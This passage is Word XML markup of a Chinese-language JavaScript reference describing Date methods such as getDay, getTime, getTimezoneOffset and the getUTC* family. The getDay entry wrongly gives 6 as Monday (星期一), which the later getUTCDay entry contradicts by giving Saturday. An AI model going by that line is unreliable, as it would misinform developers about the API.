        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="Date_getDay__"/>
      <w:r>
        <w:t>Date.getDay()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一周中的日期值。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date.getDay()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一周中的日期值，使用本地时间。返回值介于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（星期天）～</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>（星期一）之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="606" w:name="Date_getFullYear__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.getFullYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值。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date.getFullYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示时的年份值。返回值是一个完整的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位数字的年份，包含世纪，而不是一个两位数字的缩写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="607" w:name="Date_getHours__"/>
      <w:r>
        <w:t>Date.getHours()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的小时值。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date.getHours()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示时的小时值。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="608" w:name="Date_getMilliseconds__"/>
      <w:r>
        <w:t>Date.getMilliseconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="608"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的毫秒值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date.getMilliseconds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示时的毫秒值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="Date_getMinutes__"/>
      <w:r>
        <w:t>Date.getMinutes()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的分钟值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date.getMinutes()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示时的分钟值。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="610" w:name="Date_getMonth__"/>
      <w:r>
        <w:t>Date.getMonth()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的月份值</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date.getMonth()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示的月份值。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="611" w:name="Date_getSeconds__"/>
      <w:r>
        <w:t>Date.getSeconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的秒钟值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date.getSeconds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>以本地时间表示的秒钟值。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="612" w:name="Date_getTime__"/>
      <w:r>
        <w:t>Date.getTime()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="612"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象以毫秒形式返回</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date.getTime()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的毫秒表示形式，即</w:t>
      </w:r>
      <w:r>
        <w:t>1970-1-01</w:t>
      </w:r>
      <w:r>
        <w:t>午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）到指定日期之间的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>将日期和时间转换为一个单独的整数。在比较两个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象或判断两个日期之间的时间差时，这个方法很有用。注意，一个日期的毫秒表示形式与时区无关，所以这个方法不存在对应的</w:t>
      </w:r>
      <w:r>
        <w:t>getUTCTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。不要把这个</w:t>
      </w:r>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与</w:t>
      </w:r>
      <w:r>
        <w:t>getDay()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getDate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法混淆，后两者分别返回一周中的日期值和一月中的日期值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以在不创建</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的情况下将一个日期或时间转换为毫秒表示形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.setTime()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="Date_getTimezoneOffset__"/>
      <w:r>
        <w:t>Date.getTimezoneOffset()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>取得与</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>时间之间的差</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date.getTimezoneOffset()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>时间与本地时间的差，用分钟表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getTimezoneOffset()</w:t>
      </w:r>
      <w:r>
        <w:t>以分钟为单位返回</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>时间与本地时间的差。实际上，这个函数告诉你当前</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码运行在哪个时区，以及给定的日期是否处于夏令时状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值的单位是分钟，而不是小时，因为有些国家的时区不是以小时为间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="614" w:name="Date_getUTCDate__"/>
      <w:r>
        <w:t>Date.getUTCDate()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="614"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一月中的日期值（全球时间）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date.getUTCDate()</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以全球时间表示的</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的一月中的日期值（介于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="615" w:name="Date_getUTCDay__"/>
      <w:r>
        <w:t>Date.getUTCDay()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>的一周中的日期值（全球时间）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date.getUTCDay()</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一周中的日期值。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（星期天）～</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>（星期六）之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="616" w:name="Date_getUTCFullYear__"/>
      <w:r>
        <w:t>Date.getUTCFullYear()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="616"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值（全球时间）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date.getUTCFullYear()</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的年份值。返回值是一个完整的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位数字的年份，而不是两位数字的缩写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="Date_getUTCHours__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.getUTCHours()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的小时值（全球时间）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date.getUTCHours()</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的小时值。返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="618" w:name="Date_getUTCMilliseconds__"/>
      <w:r>
        <w:t>Date.getUTCMilliseconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的毫秒值（全球时间）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date.getUTCMilliseconds()</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的毫秒值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="Date_getUTCMinutes__"/>
      <w:r>
        <w:t>Date.getUTCMinutes()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的分钟值（全球时间）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date.getUTCMinutes()</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的分钟值。返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="620" w:name="Date_getUTCMonth__"/>
      <w:r>
        <w:t>Date.getUTCMonth()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一年中的月份值（全球时间）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date.getUTCMonth()</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的一年中的月份值。返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间的一个整数。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象用</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>表示一个月中的第一天，但用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>表示一年中的第一个月。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="621" w:name="Date_getUTCSeconds__"/>
      <w:r>
        <w:t>Date.getUTCSeconds()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的秒数值（全球时间）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date.getUTCSeconds()</w:t>
